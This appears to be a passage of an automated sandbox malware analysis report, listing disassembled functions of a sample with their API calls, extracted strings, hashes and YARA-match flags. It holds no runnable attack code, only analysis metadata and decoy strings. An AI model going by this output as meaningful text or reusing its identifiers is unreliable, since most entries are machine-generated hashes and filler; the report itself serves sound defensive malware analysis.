                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l_write_string
                                • String ID: ("Incorrect format specifier", 0)$9$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 3455034128-2408376751
                                • Opcode ID: 81b342c3de4b81c4f193326606ea6beaa0a6bc9959ef302e784d200aef1d6cf9
                                • Instruction ID: 7198dd68fd240182f9831290eba8b3e1152ec5318d6a16943d17656d53a6a5b4
                                • Opcode Fuzzy Hash: 81b342c3de4b81c4f193326606ea6beaa0a6bc9959ef302e784d200aef1d6cf9
                                • Instruction Fuzzy Hash: 67F13AB19002299FDB24CF54CC85BAEB7B5FB85304F1441AAE609B7281D7389E84CF5E
                                APIs
                                • __get_printf_count_output.LIBCMTD ref: 00417529
                                • __invalid_parameter.LIBCMTD ref: 004175B0
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 004175C5
                                • _write_multi_char.LIBCMTD ref: 00417B3E
                                • _write_string.LIBCMTD ref: 00417B59
                                • _write_multi_char.LIBCMTD ref: 00417B85
                                • _wctomb_s.LIBCMTD ref: 00417C02
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter_wctomb_s_write_string
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 4103101190-2363074782
                                • Opcode ID: 940be81e2a341b2a71ae495fb6ade5a5bd19aa91271bae1eb43d3d1588974342
                                • Instruction ID: 4d83509c2fbd25f8b4bd126f7decccbf39e2d0613780b551442f717b8b193385
                                • Opcode Fuzzy Hash: 940be81e2a341b2a71ae495fb6ade5a5bd19aa91271bae1eb43d3d1588974342
                                • Instruction Fuzzy Hash: F3A17E70E092289BDF24DF55CC89BEEB7B1AB44305F1481DAE4197A281E7789EC0CF59
                                APIs
                                • __get_printf_count_output.LIBCMTD ref: 0040AC0C
                                • __invalid_parameter.LIBCMTD ref: 0040AC93
                                • _LocaleUpdate::~_LocaleUpdate.LIBCMTD ref: 0040ACA8
                                • _write_multi_char.LIBCMTD ref: 0040B23B
                                • _write_string.LIBCMTD ref: 0040B256
                                • _write_multi_char.LIBCMTD ref: 0040B282
                                • __mbtowc_l.LIBCMTD ref: 0040B2F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_write_string
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 900999819-1989478660
                                • Opcode ID: bc9228824b490252d205db984fcd876d868e63ab9bc971916b5465e00f6a7851
                                • Instruction ID: 50601d3e0531b0588c2bb1b5147752684b48b2b10e321c2d725c09cb2447f8df
                                • Opcode Fuzzy Hash: bc9228824b490252d205db984fcd876d868e63ab9bc971916b5465e00f6a7851
                                • Instruction Fuzzy Hash: 28A160B09002289BDB24DF55CC85BAEB774EB44304F1484EAE6097B2C2D7789E84CF5E
                                APIs
                                Strings
                                • strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 0040E09A
                                • (*_errno()), xrefs: 0040E05D
                                • ..., xrefs: 0040DF97, 0040E00E
                                • Microsoft Visual C++ Debug Library, xrefs: 0040E0C6
                                • __crtMessageWindowA, xrefs: 0040E058, 0040E095
                                • Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application), xrefs: 0040E025
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c, xrefs: 0040E053, 0040E090
                                • _CrtDbgReport: String too long or IO Error, xrefs: 0040E09F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
                                • String ID: (*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                • API String ID: 1485069716-310124888
                                • Opcode ID: 7100a534ce97518ffe7d03be812db5348420b203e7e00c6074795d7f679a1ea8
                                • Instruction ID: 96cf9c2e9b25c396088fcc663dc55a34938e120d9734740b5c7e635f4373f3c5
                                • Opcode Fuzzy Hash: 7100a534ce97518ffe7d03be812db5348420b203e7e00c6074795d7f679a1ea8
                                • Instruction Fuzzy Hash: 5931A470B40228BBCB24DB91DC42FDAB3746B58705F0085AAF709772C1D6BC5B908F99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _write_multi_char$_strlen_wctomb_s_write_string
                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 433996309-3257747220
                                • Opcode ID: 55a63bbf500c120894551c3e6a08c3f4aebf5a0a65057ba823adc84a8df4a850
                                • Instruction ID: e66655f8806d7c8cbde8537ac2bfda897eeaa8f574f1db698dcfd8e6f16f1032
                                • Opcode Fuzzy Hash: 55a63bbf500c120894551c3e6a08c3f4aebf5a0a65057ba823adc84a8df4a850
                                • Instruction Fuzzy Hash: 1BA16AB4D052289BDB24CF54CC89BEEB7B1AB48305F1481DAE4196B281E7789EC0CF59
                                APIs
                                Strings
                                • Error: memory allocation: bad memory block type., xrefs: 004027E4
                                • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c, xrefs: 0040269F
                                • _CrtCheckMemory(), xrefs: 00402693
                                • Client hook allocation failure at file %hs line %d., xrefs: 00402728
                                • Client hook allocation failure., xrefs: 00402745
                                • Invalid allocation size: %Iu bytes., xrefs: 00402793
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _memset$CheckMemory__heap_alloc_base
                                • String ID: Client hook allocation failure at file %hs line %d.$Client hook allocation failure.$Error: memory allocation: bad memory block type.$Invalid allocation size: %Iu bytes.$_CrtCheckMemory()$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                                • API String ID: 4254127243-2462871736
                                • Opcode ID: d6097b060a62439e2152c6dc02346f7700921db991c2b7b29aa7b3065ddfcecf
                                • Instruction ID: 3a710de15ead0d29ef39a83c8592ab52a46c7b78c449804f59a33d05e5b31229
                                • Opcode Fuzzy Hash: d6097b060a62439e2152c6dc02346f7700921db991c2b7b29aa7b3065ddfcecf
                                • Instruction Fuzzy Hash: DFA17F74A002059FDB24DF45DA89B9A77F1BB88314F20826AE9057B3D1D3B9AD40CF9D
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: _write_multi_char$__mbtowc_l_strlen_write_string
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
                                • API String ID: 3252303123-2264504294
                                • Opcode ID: 3c303c824d7fffb96db92174ffbaa8836be3c7a50a02f88503ca757337f2be7c
                                • Instruction ID: 3f904ac5b13f381e4a3ba85f902fbcbc3f7a825f9bd1bb949450c76b77106929
                                • Opcode Fuzzy Hash: 3c303c824d7fffb96db92174ffbaa8836be3c7a50a02f88503ca757337f2be7c
                                • Instruction Fuzzy Hash: 3CA15DB1D002189BDB24CF55CD85BAEB7B5EB44304F1481AAE6097B282D7789E84CF5E
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                • String ID:
                                • API String ID: 1442030790-0
                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction ID: 43e677761a587c9b91b48a77f13585c6602ced2ed840fcb28a0ee1d72538e486
                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction Fuzzy Hash: 5B21CFF2624301BAE7333FE5CC01E2B7BEEDF42760B508029E548550ACEB628560CE58
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: Locale__inc$UpdateUpdate::~___mbtowc_l__un_inc_memset
                                • String ID: $]${${
                                • API String ID: 2643002128-1336171634
                                • Opcode ID: a27df5cfc8be1d50458e865ef07640ca86c8d6c28c443dcdd830912afdda915c
                                • Instruction ID: a55bc354a5c1ddee6c691bf7f824df5111db2af8bf9357ee96e76c7a3c3def74
                                • Opcode Fuzzy Hash: a27df5cfc8be1d50458e865ef07640ca86c8d6c28c443dcdd830912afdda915c
                                • Instruction Fuzzy Hash: CAB1B570D092989BCF15CBA9C4906FDBBB1AF46304F14C1AFE8A97B382C6385A45CF55
                                APIs
                                • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041EF20
                                • DeleteVolumeMountPointA.KERNEL32(Gatuwoxa yudesozuja nuxo bavisiyoxopav), ref: 0041EFAC
                                • GetSystemPowerStatus.KERNEL32(00000000), ref: 0041EFC9
                                • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EFDE
                                • OpenThread.KERNEL32(00000000,00000000,00000000), ref: 0041F005
                                • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 0041F00F
                                • RequestWakeupLatency.KERNEL32(00000000), ref: 0041F017
                                • CreateJobObjectA.KERNEL32(00000000,00000000), ref: 0041F04D
                                • GetPrivateProfileSectionNamesW.KERNEL32(?,00000000,00000000), ref: 0041F08D
                                • GlobalFix.KERNEL32(00000000), ref: 0041F095
                                • LocalLock.KERNEL32(00000000), ref: 0041F0BA
                                • WriteProfileStringA.KERNEL32(Nawihuxoxu,Neyobatud ziyigo fuhuruh mag puyojidiz,Ribomavepahi bulihunosawimu pofuno nupoji), ref: 0041F0CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: ProfileVolume$BoostCreateDeleteGlobalInformationLatencyLocalLockMountMultipleNamesObjectObjectsOpenPointPowerPriorityPrivateProcessRequestSectionStatusStringSystemThreadWaitWakeupWrite
                                • String ID: $Gatuwoxa yudesozuja nuxo bavisiyoxopav
                                • API String ID: 2940459343-2894084202
                                • Opcode ID: e5892b2106d80f3332c741eaeab687b45e52fa1cce8384dfb5169f295ec77b41
                                • Instruction ID: 618d0c281e6e2d461271ab7a7dd81734c2ce3b673418e8be139b9d5285146930
                                • Opcode Fuzzy Hash: e5892b2106d80f3332c741eaeab687b45e52fa1cce8384dfb5169f295ec77b41
                                • Instruction Fuzzy Hash: B04114B0E05209DFDBA0CFA8E946BAEB7B0FF08705F108129E515B7291C3746A45CF5A
                                APIs
                                • std::exception::exception.LIBCMT ref: 0225FC1F
                                  • Part of subcall function 0224169C: std::exception::_Copy_str.LIBCMT ref: 022416B5
                                • __CxxThrowException@8.LIBCMT ref: 0225FC34
                                • std::exception::exception.LIBCMT ref: 0225FC4D
                                • __CxxThrowException@8.LIBCMT ref: 0225FC62
                                • std::regex_error::regex_error.LIBCPMT ref: 0225FC74
                                  • Part of subcall function 0225F914: std::exception::exception.LIBCMT ref: 0225F92E
                                • __CxxThrowException@8.LIBCMT ref: 0225FC82
                                • std::exception::exception.LIBCMT ref: 0225FC9B
                                • __CxxThrowException@8.LIBCMT ref: 0225FCB0
                                Strings
                                • ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom. , xrefs: 0225FCB6
                                • leM, xrefs: 0225FCA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                • String ID: leM$ruhud. Ticodiputabu rid. Hicawaguroxoli dolebeve sodubu. Vubawevilapahi kiwowac ritopaxulizaz. Bohaxudoloc rabapune. Pipujiha dacihiz wawoyivojijuki. Winorujoja pegep. Xuj fimifagomibex bilawukofiral jilohogicurujam xoxitolelupagel. Vigu getosixiti jumebivom.
                                • API String ID: 3569886845-85255083
                                • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction ID: 4cace3a36ab4f96211a5124a0b7b9309c5d1ea736ff362843ef9ef6c07d23c3d
                                • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                • Instruction Fuzzy Hash: 11110A79C1030DBBCB04FFE5D455CDDBB7DAA04740B408566AD1897244EB74E3988F94
                                APIs
                                • _memset.LIBCMT ref: 02233F51
                                  • Part of subcall function 02235BA8: __getptd_noexit.LIBCMT ref: 02235BA8
                                • __gmtime64_s.LIBCMT ref: 02233FEA
                                • __gmtime64_s.LIBCMT ref: 02234020
                                • __gmtime64_s.LIBCMT ref: 0223403D
                                • __allrem.LIBCMT ref: 02234093
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340AF
                                • __allrem.LIBCMT ref: 022340C6
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022340E4
                                • __allrem.LIBCMT ref: 022340FB
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02234119
                                • __invoke_watson.LIBCMT ref: 0223418A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                • String ID:
                                • API String ID: 384356119-0
                                • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction ID: 3d594bb0021cdbbe7c166fbaf83174a8e1b95cea3535d1da0ab277559336700b
                                • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                • Instruction Fuzzy Hash: 7F71DCB1A20B17ABD719EEB9CC40B5A73B9BF10364F144179E514E6698EB70DA40CBD0
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                • String ID:
                                • API String ID: 3432600739-0
                                • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction ID: 13070783de127a844da865ecfea733f2e72da22a6ff5c4f06fe18d72e5cf3246
                                • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                • Instruction Fuzzy Hash: 4E4124F2924305BFDB02AFE4D980BAE3BFEAF04314F10442DE91496198CBB98544DF19
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ExitProcess___crt
                                • String ID:
                                • API String ID: 1022109855-0
                                • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction ID: 558906d036ddeb4ea88fbf3840553051b634a0af95356c6ea759be9e724f0a94
                                • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                • Instruction Fuzzy Hash: 0431C8B3A10351DFCF135F94FC8084977A6FB14324705852AFA085B2B4CBB459C99F96
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc_wprintf$_sprintf
                                • String ID:
                                • API String ID: 3721157643-0
                                • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction ID: e66e6d6fce36724f08fa0e87f28dcffd884ae719a26e05bfbc28b623991f5ddb
                                • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                • Instruction Fuzzy Hash: C11136F2A207607AC262A3F40C11FFF7BDD9F45302F0801A9FE9DD1184EA185A149BB1
                                APIs
                                • GetStartupInfoA.KERNEL32(?), ref: 0040D220
                                • GetFileType.KERNEL32(?), ref: 0040D4A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: FileInfoStartupType
                                • String ID: f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
                                • API String ID: 3016745765-4097262939
                                • Opcode ID: 83dd7d908ca013652f32cd87f61a54e85bb94d62dd15d6cfb5665a21b32d14e3
                                • Instruction ID: 36c72e9a2a40bb0094e96d1680f38d34c49332ccf1b30c68ee8f1816f6700f51
                                • Opcode Fuzzy Hash: 83dd7d908ca013652f32cd87f61a54e85bb94d62dd15d6cfb5665a21b32d14e3
                                • Instruction Fuzzy Hash: 45E11D74E04248CFDB24CFA4C895BADBBB1BF49314F24826ED8666B392C7359846CF45
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2146950614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2146934930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146968884.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146981917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2146993446.000000000042D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147045851.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2147061405.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_tsnsd8pOvn.jbxd
                                Similarity
                                • API ID: __inc$__mbtowc_l__un_inc
                                • String ID: $c
                                • API String ID: 579247601-3797896886
                                • Opcode ID: 459f95d43a17544e28acbd3824ffc4665fbdc270f80fafe1df8b7806a9c0a968
                                • Instruction ID: 9bffdf364293041a8ac0501eb72f12c760eb3672f1de84baf0ea36423c0b4b7c
                                • Opcode Fuzzy Hash: 459f95d43a17544e28acbd3824ffc4665fbdc270f80fafe1df8b7806a9c0a968
                                • Instruction Fuzzy Hash: 8491A070D05258DBCF24CF64C9946EEBB71AF45304F1481AFE8A97B382DA385A81CF19
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2210000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                • String ID:
                                • API String ID: 65388428-0
